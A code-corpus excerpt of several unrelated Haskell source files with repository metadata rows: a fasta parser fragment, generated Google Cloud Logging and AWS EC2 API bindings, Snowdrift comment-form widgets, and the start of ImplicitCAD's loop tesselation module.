removeN fseq = fseq { fastaSeq = scrub (fastaSeq fseq) }
  where
    scrub = T.map replaceN
    replaceN c
        | c == 'N' || c == 'n' = '-'
        | otherwise            = c
-- | Remove Ns from a collection of CLIP fasta sequences
--
-- Rebuilds the map, replacing \'N\'\/\'n\' with \'-\' in both the
-- germline sequence and every clone sequence; the numeric part of each
-- key is left untouched.
removeCLIPNs :: CloneMap -> CloneMap
removeCLIPNs = Map.fromList . map remove . Map.toList
  where
    remove ((!x, !y), !z) = ((x, newSeq y), map newSeq z)
    newSeq !x = x { fastaSeq = noN . fastaSeq $ x }
    noN = T.map (\y -> if y /= 'N' && y /= 'n' then y else '-')
| GregorySchwartz/fasta | src/Data/Fasta/Text/Parse.hs | gpl-3.0 | 5,965 | 0 | 14 | 1,667 | 1,860 | 996 | 864 | 134 | 2 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# OPTIONS_GHC -fno-warn-duplicate-exports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- |
-- Module : Network.Google.Resource.Logging.Organizations.Locations.Buckets.Views.Get
-- Copyright : (c) 2015-2016 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Gets a view.
--
-- /See:/ <https://cloud.google.com/logging/docs/ Cloud Logging API Reference> for @logging.organizations.locations.buckets.views.get@.
module Network.Google.Resource.Logging.Organizations.Locations.Buckets.Views.Get
(
-- * REST Resource
OrganizationsLocationsBucketsViewsGetResource
-- * Creating a Request
, organizationsLocationsBucketsViewsGet
, OrganizationsLocationsBucketsViewsGet
-- * Request Lenses
, olbvgXgafv
, olbvgUploadProtocol
, olbvgAccessToken
, olbvgUploadType
, olbvgName
, olbvgCallback
) where
import Network.Google.Logging.Types
import Network.Google.Prelude
-- | A resource alias for @logging.organizations.locations.buckets.views.get@ method which the
-- 'OrganizationsLocationsBucketsViewsGet' request conforms to.
type OrganizationsLocationsBucketsViewsGetResource =
"v2" :>
Capture "name" Text :>
QueryParam "$.xgafv" Xgafv :>
QueryParam "upload_protocol" Text :>
QueryParam "access_token" Text :>
QueryParam "uploadType" Text :>
QueryParam "callback" Text :>
QueryParam "alt" AltJSON :> Get '[JSON] LogView
-- | Gets a view.
--
-- /See:/ 'organizationsLocationsBucketsViewsGet' smart constructor.
-- NOTE: auto-generated request record (see the module header); each
-- field is documented on its corresponding lens below.
data OrganizationsLocationsBucketsViewsGet =
  OrganizationsLocationsBucketsViewsGet'
    { _olbvgXgafv :: !(Maybe Xgafv)
    , _olbvgUploadProtocol :: !(Maybe Text)
    , _olbvgAccessToken :: !(Maybe Text)
    , _olbvgUploadType :: !(Maybe Text)
    , _olbvgName :: !Text
    , _olbvgCallback :: !(Maybe Text)
    }
  deriving (Eq, Show, Data, Typeable, Generic)
-- | Creates a value of 'OrganizationsLocationsBucketsViewsGet' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'olbvgXgafv'
--
-- * 'olbvgUploadProtocol'
--
-- * 'olbvgAccessToken'
--
-- * 'olbvgUploadType'
--
-- * 'olbvgName'
--
-- * 'olbvgCallback'
organizationsLocationsBucketsViewsGet
:: Text -- ^ 'olbvgName'
-> OrganizationsLocationsBucketsViewsGet
organizationsLocationsBucketsViewsGet pOlbvgName_ =
OrganizationsLocationsBucketsViewsGet'
{ _olbvgXgafv = Nothing
, _olbvgUploadProtocol = Nothing
, _olbvgAccessToken = Nothing
, _olbvgUploadType = Nothing
, _olbvgName = pOlbvgName_
, _olbvgCallback = Nothing
}
-- | V1 error format.
olbvgXgafv :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Xgafv)
olbvgXgafv
= lens _olbvgXgafv (\ s a -> s{_olbvgXgafv = a})
-- | Upload protocol for media (e.g. \"raw\", \"multipart\").
olbvgUploadProtocol :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgUploadProtocol
= lens _olbvgUploadProtocol
(\ s a -> s{_olbvgUploadProtocol = a})
-- | OAuth access token.
olbvgAccessToken :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgAccessToken
= lens _olbvgAccessToken
(\ s a -> s{_olbvgAccessToken = a})
-- | Legacy upload protocol for media (e.g. \"media\", \"multipart\").
olbvgUploadType :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgUploadType
= lens _olbvgUploadType
(\ s a -> s{_olbvgUploadType = a})
-- | Required. The resource name of the policy:
-- \"projects\/[PROJECT_ID]\/locations\/[LOCATION_ID]\/buckets\/[BUCKET_ID]\/views\/[VIEW_ID]\"
-- Example:
-- \"projects\/my-project-id\/locations\/my-location\/buckets\/my-bucket-id\/views\/my-view-id\".
olbvgName :: Lens' OrganizationsLocationsBucketsViewsGet Text
olbvgName
= lens _olbvgName (\ s a -> s{_olbvgName = a})
-- | JSONP
olbvgCallback :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgCallback
= lens _olbvgCallback
(\ s a -> s{_olbvgCallback = a})
instance GoogleRequest
OrganizationsLocationsBucketsViewsGet
where
type Rs OrganizationsLocationsBucketsViewsGet =
LogView
type Scopes OrganizationsLocationsBucketsViewsGet =
'["https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/cloud-platform.read-only",
"https://www.googleapis.com/auth/logging.admin",
"https://www.googleapis.com/auth/logging.read"]
requestClient
OrganizationsLocationsBucketsViewsGet'{..}
= go _olbvgName _olbvgXgafv _olbvgUploadProtocol
_olbvgAccessToken
_olbvgUploadType
_olbvgCallback
(Just AltJSON)
loggingService
where go
= buildClient
(Proxy ::
Proxy OrganizationsLocationsBucketsViewsGetResource)
mempty
| brendanhay/gogol | gogol-logging/gen/Network/Google/Resource/Logging/Organizations/Locations/Buckets/Views/Get.hs | mpl-2.0 | 5,528 | 0 | 15 | 1,151 | 709 | 417 | 292 | 110 | 1 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE LambdaCase #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- Module : Network.AWS.EC2.DescribeExportTasks
-- Copyright : (c) 2013-2014 Brendan Hay <brendan.g.hay@gmail.com>
-- License : This Source Code Form is subject to the terms of
-- the Mozilla Public License, v. 2.0.
-- A copy of the MPL can be found in the LICENSE file or
-- you can obtain it at http://mozilla.org/MPL/2.0/.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : experimental
-- Portability : non-portable (GHC extensions)
--
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- | Describes one or more of your export tasks.
--
-- <http://docs.aws.amazon.com/AWSEC2/latest/APIReference/ApiReference-query-DescribeExportTasks.html>
module Network.AWS.EC2.DescribeExportTasks
(
-- * Request
DescribeExportTasks
-- ** Request constructor
, describeExportTasks
-- ** Request lenses
, detExportTaskIds
-- * Response
, DescribeExportTasksResponse
-- ** Response constructor
, describeExportTasksResponse
-- ** Response lenses
, detrExportTasks
) where
import Network.AWS.Prelude
import Network.AWS.Request.Query
import Network.AWS.EC2.Types
import qualified GHC.Exts
newtype DescribeExportTasks = DescribeExportTasks
{ _detExportTaskIds :: List "ExportTaskId" Text
} deriving (Eq, Ord, Read, Show, Monoid, Semigroup)
-- | 'DescribeExportTasks' constructor.
--
-- The fields accessible through corresponding lenses are:
--
-- * 'detExportTaskIds' @::@ ['Text']
--
describeExportTasks :: DescribeExportTasks
describeExportTasks = DescribeExportTasks
{ _detExportTaskIds = mempty
}
-- | One or more export task IDs.
detExportTaskIds :: Lens' DescribeExportTasks [Text]
detExportTaskIds = lens _detExportTaskIds (\s a -> s { _detExportTaskIds = a }) . _List
newtype DescribeExportTasksResponse = DescribeExportTasksResponse
{ _detrExportTasks :: List "item" ExportTask
} deriving (Eq, Read, Show, Monoid, Semigroup)
-- | 'DescribeExportTasksResponse' constructor.
--
-- The fields accessible through corresponding lenses are:
--
-- * 'detrExportTasks' @::@ ['ExportTask']
--
describeExportTasksResponse :: DescribeExportTasksResponse
describeExportTasksResponse = DescribeExportTasksResponse
{ _detrExportTasks = mempty
}
-- | Information about the export tasks.
detrExportTasks :: Lens' DescribeExportTasksResponse [ExportTask]
detrExportTasks = lens _detrExportTasks (\s a -> s { _detrExportTasks = a }) . _List
instance ToPath DescribeExportTasks where
toPath = const "/"
instance ToQuery DescribeExportTasks where
toQuery DescribeExportTasks{..} = mconcat
[ "ExportTaskId" `toQueryList` _detExportTaskIds
]
instance ToHeaders DescribeExportTasks
instance AWSRequest DescribeExportTasks where
type Sv DescribeExportTasks = EC2
type Rs DescribeExportTasks = DescribeExportTasksResponse
request = post "DescribeExportTasks"
response = xmlResponse
-- Decode the response body: the "exportTaskSet" element may be absent,
-- in which case the task list defaults to empty ('.!@' 'mempty').
instance FromXML DescribeExportTasksResponse where
    parseXML x = DescribeExportTasksResponse
        <$> x .@? "exportTaskSet" .!@ mempty
| romanb/amazonka | amazonka-ec2/gen/Network/AWS/EC2/DescribeExportTasks.hs | mpl-2.0 | 3,584 | 0 | 10 | 714 | 434 | 265 | 169 | 52 | 1 |
module View.Comment
( commentForm
, commentFormWidget
, commentForestWidget
, commentTreeWidget
, commentWidget
, disabledCommentForm
-- Comment action forms
, claimCommentForm
, unclaimCommentForm
, watchCommentForm
, unwatchCommentForm
, closeCommentForm
, commentNewTopicForm
, commentReplyForm
, createCommentTagForm
, editCommentForm
, flagCommentForm
, generateFlagCommentForm
, newCommentTagForm
, rethreadCommentForm
, retractCommentForm
-- Comment action form widgets
, approveCommentFormWidget
, claimCommentFormWidget
, closeCommentFormWidget
, commentNewTopicFormWidget
, commentReplyFormWidget
, deleteCommentFormWidget
, editCommentFormWidget
, flagCommentFormWidget
, rethreadCommentFormWidget
, retractCommentFormWidget
, unclaimCommentFormWidget
, watchCommentFormWidget
, unwatchCommentFormWidget
-- Misc
, orderingNewestFirst
) where
import Import
import Model.Comment
import Model.Comment.ActionPermissions
import Model.Comment.Routes
import Model.Tag
import Model.User
import Model.Markdown
import View.User
import Widgets.Markdown
import Widgets.Tag
import Widgets.Time
import qualified Data.List as L
import qualified Data.Map as M
import qualified Data.Text as T
import qualified Data.Traversable as Traversable
import Data.Tree (Forest, Tree(..))
import qualified Data.Tree as Tree
-- | Read-only stand-in for the reply form: the markdown field carries
-- the HTML @disabled@ attribute, so it renders but cannot be edited or
-- submitted.
disabledCommentForm :: Form Markdown
disabledCommentForm = renderBootstrap3 BootstrapBasicForm $ areq snowdriftMarkdownField ("Reply" { fsAttrs = [("disabled",""), ("class","form-control")] }) Nothing
closureForm :: SomeMessage App -> Maybe Markdown -> Form NewClosure
closureForm label message = renderBootstrap3 BootstrapBasicForm $ NewClosure <$> areq' snowdriftMarkdownField label message
commentForm :: SomeMessage App -> Maybe Markdown -> Form NewComment
commentForm label content = renderBootstrap3 BootstrapBasicForm $ NewComment
<$> areq' snowdriftMarkdownField label content
<*> pure VisPublic
<*> areq' (selectField makeLanguageOptions) "Language" Nothing
-- TODO replace pure line above with below and uncomment where to activate private commenting
-- <*> (toVisibility <$> areq' checkBoxField "Private?" Nothing)
-- where
-- toVisibility True = VisPrivate
-- toVisibility _ = VisPublic
commentFormWidget :: Text -> SomeMessage App -> Maybe Markdown -> Widget
commentFormWidget post_text label content = commentFormWidget' True post_text (commentForm label content)
-- intentional duplication of commentFormWidget' because some aspects
-- of closing and other markdown aren't identical (such as marking privacy)
closureFormWidget' :: Text -> Form NewClosure -> Widget
closureFormWidget' post_text form = do
(widget, enctype) <- handlerToWidget $ generateFormPost form
[whamlet|
<div>
<form method="POST" enctype=#{enctype}>
^{widget}
<button type="submit" name="mode" value="preview">preview
<button type="submit" name="mode" value="post">#{post_text}
|]
commentFormWidget' :: Bool -> Text -> Form a -> Widget
commentFormWidget' can_preview post_text form = do
(widget, enctype) <- handlerToWidget $ generateFormPost form
[whamlet|
<div>
<form method="POST" enctype=#{enctype}>
^{widget}
$if can_preview
<button type="submit" name="mode" value="preview">preview
<button type="submit" name="mode" value="post">#{post_text}
|]
closeCommentForm :: Maybe Markdown -> Form NewClosure
retractCommentForm :: Maybe Markdown -> Form NewClosure
commentNewTopicForm :: Form NewComment
commentReplyForm :: Form NewComment
editCommentForm :: Markdown -> Language -> Form EditComment
closeCommentForm = closureForm "Reason for closing:"
retractCommentForm = closureForm "Reason for retracting:"
commentNewTopicForm = commentForm "New Topic" Nothing
commentReplyForm = commentForm "Reply" Nothing
editCommentForm content language =
renderBootstrap3 BootstrapBasicForm $ EditComment
<$> areq' snowdriftMarkdownField "Edit" (Just content)
<*> areq' (selectField makeLanguageOptions) "Language" (Just language)
claimCommentFormWidget :: Maybe (Maybe Text) -> Widget
closeCommentFormWidget :: Maybe Markdown -> Widget
commentNewTopicFormWidget :: Widget
commentReplyFormWidget :: Widget
retractCommentFormWidget :: Maybe Markdown -> Widget
unclaimCommentFormWidget :: Maybe (Maybe Text) -> Widget
watchCommentFormWidget :: Widget
unwatchCommentFormWidget :: Widget
editCommentFormWidget :: Markdown -> Language -> Widget
closeCommentFormWidget = closureFormWidget' "close" . closeCommentForm
retractCommentFormWidget = closureFormWidget' "retract" . retractCommentForm
claimCommentFormWidget = commentFormWidget' False "claim" . claimCommentForm
unclaimCommentFormWidget = commentFormWidget' False "unclaim" . unclaimCommentForm
commentNewTopicFormWidget = commentFormWidget' True "post" commentNewTopicForm
commentReplyFormWidget = commentFormWidget' True "post" commentReplyForm
watchCommentFormWidget = commentFormWidget' False "watch" watchCommentForm
unwatchCommentFormWidget = commentFormWidget' False "unwatch" unwatchCommentForm
editCommentFormWidget content language =
commentFormWidget' True "post" $ editCommentForm content language
approveCommentFormWidget :: Widget
approveCommentFormWidget =
[whamlet|
<form method="POST">
<button type="submit" name="mode" value="post">approve
|]
-- | Optional free-text note recorded when a user claims a comment.
claimCommentForm :: Maybe (Maybe Text) -> Form (Maybe Text)
claimCommentForm = renderBootstrap3 BootstrapBasicForm . aopt' textField "Note (optional)"
-- | Identical in shape to 'claimCommentForm': an optional note
-- recorded when a claim is released.
unclaimCommentForm :: Maybe (Maybe Text) -> Form (Maybe Text)
unclaimCommentForm = renderBootstrap3 BootstrapBasicForm . aopt' textField "Note (optional)"
rethreadCommentForm :: Form (Text, Text)
rethreadCommentForm = renderBootstrap3 BootstrapBasicForm $ (,)
<$> areq' textField "New Parent Url" Nothing
<*> areq' textField "Reason" Nothing
rethreadCommentFormWidget :: Widget
rethreadCommentFormWidget = do
(form, enctype) <- handlerToWidget (generateFormPost rethreadCommentForm)
[whamlet|
<form method=post enctype=#{enctype}>
^{form}
<button type="submit" name="mode" value="post">rethread
|]
watchCommentForm :: Form ()
watchCommentForm = renderBootstrap3 BootstrapBasicForm $ pure ()
unwatchCommentForm :: Form ()
unwatchCommentForm = renderBootstrap3 BootstrapBasicForm $ pure ()
createCommentTagForm :: Form Text
createCommentTagForm = renderBootstrap3 BootstrapBasicForm $ areq' textField "Make a new tag:" Nothing
-- | Two checkbox clouds for tagging a comment: tags already used in
-- this project, and tags used in other projects.  Either group may be
-- left unchecked (hence the 'Maybe' lists in the result).
-- NOTE(review): the @PersistInt64@ lambda and 'read' in
-- @olReadExternal@ are both partial — they crash on tags whose keys
-- are not Int64-backed or on malformed form input; confirm tag keys
-- are always integral before relying on this.
newCommentTagForm :: [Entity Tag] -> [Entity Tag] -> Form (Maybe [TagId], Maybe [TagId])
newCommentTagForm project_tags other_tags = renderBootstrap3 BootstrapBasicForm $ (,)
    -- <$> fmap (\(Entity tag_id tag) -> aopt checkBoxField (tag_id) (tagName tag)) (project_tags <> other_tags)
    <$> aopt (tagCloudFieldList project_tags) "Tags used elsewhere in this project:" Nothing
    <*> aopt (tagCloudFieldList other_tags) "Tags used in other projects:" Nothing
    -- <*> areq hiddenField "" (Just "apply")
  where
    -- Render a list of tags as a checkbox option list, round-tripping
    -- each TagId through its textual integer representation.
    tagCloudFieldList tags =
        let toOption (Entity tag_id tag) = Option
                { optionDisplay = tagName tag
                , optionInternalValue = tag_id
                , optionExternalValue =
                    (\(PersistInt64 i) -> T.pack $ show i) $
                    toPersistValue tag_id
                }
            optlist = OptionList
                { olOptions = map toOption tags
                , olReadExternal = Just . key . PersistInt64 . read . T.unpack
                }
        in checkboxesField' (return optlist)
-- | Code-of-conduct flagging form: an optional set of reasons (one checkbox
-- per 'FlagReason' constructor) plus an optional markdown message.
flagCommentForm :: Maybe (Maybe [FlagReason]) -> Maybe (Maybe Markdown) -> Form (Maybe [FlagReason], Maybe Markdown)
flagCommentForm def_reasons def_message = renderBootstrap3 BootstrapBasicForm $ (,) <$> flagReasonsForm <*> additionalCommentsForm
  where
    flagReasonsForm :: AForm Handler (Maybe [FlagReason])
    flagReasonsForm = aopt (checkboxesFieldList reasons) "" def_reasons
      where
        -- Every FlagReason constructor, labelled by its description.
        reasons :: [(Text, FlagReason)]
        reasons = map (descFlagReason &&& id) [minBound..maxBound]
    additionalCommentsForm :: AForm Handler (Maybe Markdown)
    additionalCommentsForm = aopt' snowdriftMarkdownField "Optional: add helpful comments to clarify the issue and/or suggestions for improvement" def_message
-- | Render 'flagCommentForm' with both a preview and a final "flag" button.
flagCommentFormWidget :: Maybe (Maybe [FlagReason]) -> Maybe (Maybe Markdown) -> Widget
flagCommentFormWidget def_reasons def_message = do
    (form, enctype) <- handlerToWidget (generateFormPost (flagCommentForm def_reasons def_message))
    [whamlet|
        <form method="POST" enctype=#{enctype}>
            <h4>Code of Conduct Violation(s):
            ^{form}
            <button type="submit" name="mode" value="preview">preview
            <button type="submit" name="mode" value="post">flag
    |]
-- | Like 'flagCommentFormWidget' but without the surrounding <form> element
-- and buttons (the discarded enctype is unused); also injects the red styling
-- for the preview action button.
generateFlagCommentForm :: Maybe (Maybe [FlagReason]) -> Maybe (Maybe Markdown) -> Widget
generateFlagCommentForm reasons message = do
    (form, _) <- handlerToWidget (generateFormPost $ flagCommentForm reasons message)
    [whamlet|
        <h4>Code of Conduct Violation(s):
        ^{form}
    |]
    toWidget [cassius|
        .preview-action-button[type=submit]
            background : dark-red
            background-image : linear-gradient(#ee2700, #bd1000)
            border-color: #a5022a
        .preview-action-button[type=submit]:hover, .preview-action-button[type=submit]:focus, .preview-action-button[type=submit]:active
            background : red
            background-image : linear-gradient(#d22935, #a5022a)
    |]
-- | Confirmation widget for deletion: POSTs mode=post to delete or
-- mode=cancel to back out. No form fields.
deleteCommentFormWidget :: Widget
deleteCommentFormWidget =
    [whamlet|
        <div>
            <form method=POST>
                <button type="submit" name="mode" value="post">delete
                <button type="submit" name="mode" value="cancel">cancel
    |]
-- | Order comment trees by newest-first, taking the root and all children of each
-- tree into consideration (essentially compares each tree's newest comment,
-- no matter how deeply nested).
orderingNewestFirst :: Tree (Entity Comment) -> Tree (Entity Comment) -> Ordering
orderingNewestFirst t1 t2 = compare (latestTs t2) (latestTs t1)
  where
    -- Newest creation time anywhere in the tree. Tree.flatten never yields
    -- an empty list (a rose tree always has a root), so maximum is safe.
    latestTs :: Tree (Entity Comment) -> UTCTime
    latestTs = L.maximum . map timestamp . Tree.flatten
    timestamp :: Entity Comment -> UTCTime
    timestamp = commentCreatedTs . entityVal
-- | Link shown in place of deeply-nested replies: re-requests the current
-- page with a larger (or absent) maxdepth query parameter.
expandCommentWidget :: Int -> MaxDepth -> Widget
expandCommentWidget num_replies new_max_depth = do
    -- NOTE(review): partial pattern — assumes a current route always exists
    -- when this widget is rendered (i.e. we are inside a handled request);
    -- confirm no caller renders this outside a request.
    Just cur_route <- getCurrentRoute
    let new_route = case new_max_depth of
            NoMaxDepth -> (cur_route, [])
            MaxDepth n -> (cur_route, [("maxdepth", T.pack (show n))])
    [whamlet|
        <a .expand href=@?{new_route}>
            #{num_replies} more #{plural num_replies "reply" "replies"}
    |]
-- | An entire comment forest.
commentForestWidget
        :: Forest (Entity Comment)
        -> Maybe UserId                      -- ^ Viewer.
        -> CommentRoutes
        -> MakeActionPermissionsMap
        -> [CommentClosing]                  -- ^ Earlier closures.
        -> [CommentRetracting]               -- ^ Earlier retracts.
        -> Map UserId User
        -> Map CommentId CommentClosing
        -> Map CommentId CommentRetracting
        -> Map CommentId (Entity Ticket)
        -> Map CommentId TicketClaiming
        -> Map CommentId (CommentFlagging, [FlagReason])
        -> Bool                              -- ^ Is preview?
        -> MaxDepth                          -- ^ Max depth.
        -> Int                               -- ^ Depth.
        -> Widget                            -- ^ Widget to display under each root comment.
        -> Widget
commentForestWidget
        comment_forest
        mviewer_id
        comment_routes
        make_action_permissions_map
        earlier_closures
        earlier_retracts
        user_map
        close_map
        retract_map
        ticket_map
        claim_map
        flag_map
        is_preview
        max_depth
        depth
        widget_under_root_comment = do
    -- Compute action permissions once for every comment in the whole forest,
    -- then share the resulting map across all trees below.
    action_permissions_map <- handlerToWidget (make_action_permissions_map (concatMap Tree.flatten comment_forest))
    forM_ comment_forest $ \comment_tree ->
        commentTreeWidget'
            comment_tree
            mviewer_id
            comment_routes
            action_permissions_map
            earlier_closures
            earlier_retracts
            user_map
            close_map
            retract_map
            ticket_map
            claim_map
            flag_map
            is_preview
            max_depth
            depth
            widget_under_root_comment
-- | An entire comment tree.
commentTreeWidget
        :: Tree (Entity Comment)
        -> Maybe UserId                      -- ^ Viewer.
        -> CommentRoutes
        -> MakeActionPermissionsMap
        -> [CommentClosing]                  -- ^ Earlier closures.
        -> [CommentRetracting]               -- ^ Earlier retracts.
        -> Map UserId User
        -> Map CommentId CommentClosing
        -> Map CommentId CommentRetracting
        -> Map CommentId (Entity Ticket)
        -> Map CommentId TicketClaiming
        -> Map CommentId (CommentFlagging, [FlagReason])
        -> Bool                              -- ^ Is preview?
        -> MaxDepth
        -> Int                               -- ^ Depth.
        -> Widget                            -- ^ Form to display under the root comment.
        -> Widget
-- A single tree is just a one-tree forest; all remaining arguments are
-- passed through unchanged.
commentTreeWidget tree = commentForestWidget [tree]
-- | Helper function for commentForestWidget/commentTreeWidget that takes an
-- ActionPermissionsMap (as opposed to a MakeActionPermissionsMap). Unexported.
commentTreeWidget'
        :: Tree (Entity Comment)
        -> Maybe UserId                      -- ^ Viewer.
        -> CommentRoutes
        -> ActionPermissionsMap
        -> [CommentClosing]                  -- ^ Earlier closures.
        -> [CommentRetracting]               -- ^ Earlier retracts.
        -> Map UserId User
        -> Map CommentId CommentClosing
        -> Map CommentId CommentRetracting
        -> Map CommentId (Entity Ticket)
        -> Map CommentId TicketClaiming
        -> Map CommentId (CommentFlagging, [FlagReason])
        -> Bool                              -- ^ Is preview?
        -> MaxDepth
        -> Int                               -- ^ Depth.
        -> Widget                            -- ^ Form to display under the root comment.
        -> Widget
commentTreeWidget'
        (Node root_entity@(Entity root_id root) children)
        mviewer_id
        comment_routes
        action_permissions_map
        earlier_closures
        earlier_retracts
        user_map
        close_map
        retract_map
        ticket_map
        claim_map
        flag_map
        is_preview
        max_depth
        depth
        form_under_root_comment = do
    -- Either recurse into the children (depth+1) or, past max_depth, render
    -- an "N more replies" expander link instead.
    let num_children = length children
        inner_widget =
            form_under_root_comment <>
            if MaxDepth depth >= max_depth && num_children > 0
                then expandCommentWidget num_children (addMaxDepth max_depth 2) -- FIXME: arbitrary '2' here
                else forM_ children $ \child ->
                         commentTreeWidget'
                             child
                             mviewer_id
                             comment_routes
                             action_permissions_map
                             [] -- don't want to show earlier closures on *all* comments, just the first one.
                             [] -- same for earlier retracts
                             user_map
                             close_map
                             retract_map
                             ticket_map
                             claim_map
                             flag_map
                             is_preview
                             max_depth
                             (depth+1)
                             mempty
    -- Both lookupErr calls rely on the caller having populated the maps for
    -- every comment in the tree; a miss is a programmer error.
    commentWidget
        root_entity
        mviewer_id
        comment_routes
        (lookupErr "comment id missing from action permissions map" root_id action_permissions_map)
        earlier_closures
        earlier_retracts
        (lookupErr "comment user missing from user map" (commentUser root) user_map)
        (M.lookup root_id close_map)
        (M.lookup root_id retract_map)
        (M.lookup root_id ticket_map)
        (M.lookup root_id claim_map)
        (M.lookup root_id flag_map)
        is_preview
        inner_widget
-- | A "single" comment, which also displays an 'inner widget' inside of it.
-- The reason this can't be made more modular is the HTML for nested comments
-- requires us to render the entire tree (can't close the parent comment's div
-- before the children comments).
--
-- Note this widget has NO CSS.
commentWidget :: Entity Comment                        -- ^ Comment.
              -> Maybe UserId                          -- ^ Viewer.
              -> CommentRoutes                         -- ^ Comment routes.
              -> CommentActionPermissions              -- ^ Permissions for comment actions.
              -> [CommentClosing]                      -- ^ Earlier closures.
              -> [CommentRetracting]                   -- ^ Earlier retracts.
              -> User                                  -- ^ Comment poster.
              -> Maybe CommentClosing                  -- ^ Is this closed?
              -> Maybe CommentRetracting               -- ^ Is this retracted?
              -> Maybe (Entity Ticket)                 -- ^ Is this a ticket?
              -> Maybe TicketClaiming                  -- ^ Is this ticket claimed?
              -> Maybe (CommentFlagging, [FlagReason]) -- ^ Is this flagged?
              -> Bool                                  -- ^ Is this a preview?
              -> Widget                                -- ^ Inner widget (children comments, 'expand' link, reply box, etc)
              -> Widget
commentWidget (Entity comment_id comment)
              mviewer_id
              CommentRoutes{..}
              CommentActionPermissions{..}
              earlier_closures
              earlier_retracts
              user
              mclosure
              mretract
              mticket
              mclaim
              mflag
              is_preview
              inner_widget = do
    let user_id       = commentUser comment
        is_unapproved = not . commentIsApproved $ comment
        is_top_level  = commentIsTopLevel  comment
        is_even_depth = commentIsEvenDepth comment
        is_odd_depth  = commentIsOddDepth  comment
        is_private    = commentIsPrivate comment
        is_closed = isJust mclosure
    -- TODO: Lots of refactoring to lift this database hit up to the
    -- controller layer. This currently has horrible performance - a hit *per* comment!
    tags <- handlerToWidget $ runDB $
        maybe [] sortAnnotTagsByName .
            M.lookup comment_id <$>
                (fetchCommentCommentTagsDB comment_id >>= buildAnnotatedCommentTagsDB mviewer_id)
    -- If the ticket is claimed, fetch the claiming user so the template can
    -- render their name. NOTE(review): partial bind — assumes the claiming
    -- user row still exists; confirm claims are deleted with their users.
    user_map <- case mclaim of
        Nothing -> return M.empty
        Just claim -> do
            let claiming_user_id = ticketClaimingUser claim
            Just claiming_user <- runDB $ get claiming_user_id
            return $ M.singleton claiming_user_id claiming_user
    let shpack = T.pack . show
        persistValue = toPersistValue . entityKey
    -- Ticket number to display: either this comment's own ticket, or (after
    -- a rethread) the ticket attached to the rethread target, else "???".
    ticket_str <- case persistValue <$> mticket of
        Just (PersistInt64 tid) -> return $ shpack tid
        _ -> do
            mrethread_ticket <- fmap join $ runDB $ do
                mcomment_rethread <- fetchCommentRethreadLastDB comment_id
                Traversable.forM mcomment_rethread $ \comment_rethread ->
                    getBy $ UniqueTicket comment_rethread
            return $ case persistValue <$> mrethread_ticket of
                Just (PersistInt64 rtid) -> shpack rtid
                _ -> "???"
    -- Rewrite a leading "ticket: " line into a styled ticket title div.
    let prettyTicketLine line =
            let pretty title = "<div class='ticket-title'>SD-" <> ticket_str <> ": " <> title <> "</div>"
            in return $ maybe line pretty $ T.stripPrefix "ticket: " line
        commentTextTransform = prettyTicketLine
    $(whamletFile "templates/comment.hamlet")
| chreekat/snowdrift | View/Comment.hs | agpl-3.0 | 20,568 | 0 | 20 | 6,062 | 3,482 | 1,808 | 1,674 | -1 | -1 |
-- Implicit CAD. Copyright (C) 2011, Christopher Olah (chris@colah.ca)
-- Copyright (C) 2016, Julia Longtin (julial@turinglace.com)
-- Released under the GNU AGPLV3+, see LICENSE
module Graphics.Implicit.Export.Render.TesselateLoops (tesselateLoop) where
import Prelude(return, ($), length, (==), zip, init, tail, reverse, (<), (/), null, foldl1, (++), head, (*), abs, (>), (&&), (+), concatMap)
import Graphics.Implicit.Definitions (ℝ, ℕ, Obj3, ℝ3, TriangleMesh(TriangleMesh), (⋅), Triangle(Triangle))
import Graphics.Implicit.Export.Render.Definitions (TriSquare(Tris, Sq))
import Graphics.Implicit.Export.Util (centroid)
import Data.VectorSpace (normalized, (^-^), (^+^), magnitude, (^/), (^*))
import Data.List (genericLength)
import Data.Cross (cross3)
-- FIXME: res should be ℝ3.
-- | Convert one boundary loop (a list of polyline sides) into triangles
-- and/or axis-aligned squares. 'res' is the sampling resolution and 'obj'
-- the implicit function, used to decide how closely the surface may be
-- approximated.
tesselateLoop :: ℝ -> Obj3 -> [[ℝ3]] -> [TriSquare]
tesselateLoop _ _ [] = []
tesselateLoop _ _ [[a,b],[_,c],[_,_]] = [Tris $ TriangleMesh [Triangle (a,b,c)]]
{-
   #____#     #____#
   |    |     |    |
   #    #  -> #____#
   |    |     |    |
   #____#     #____#
-}
-- Two opposite sides subdivided the same way: split into a ladder of quads
-- and recurse on each rung.
tesselateLoop res obj [[_,_], as@(_:_:_:_),[_,_], bs@(_:_:_:_)] | length as == length bs =
    concatMap (tesselateLoop res obj)
        [[[a1,b1],[b1,b2],[b2,a2],[a2,a1]] | ((a1,b1),(a2,b2)) <- zip (init pairs) (tail pairs)]
            where pairs = zip (reverse as) bs
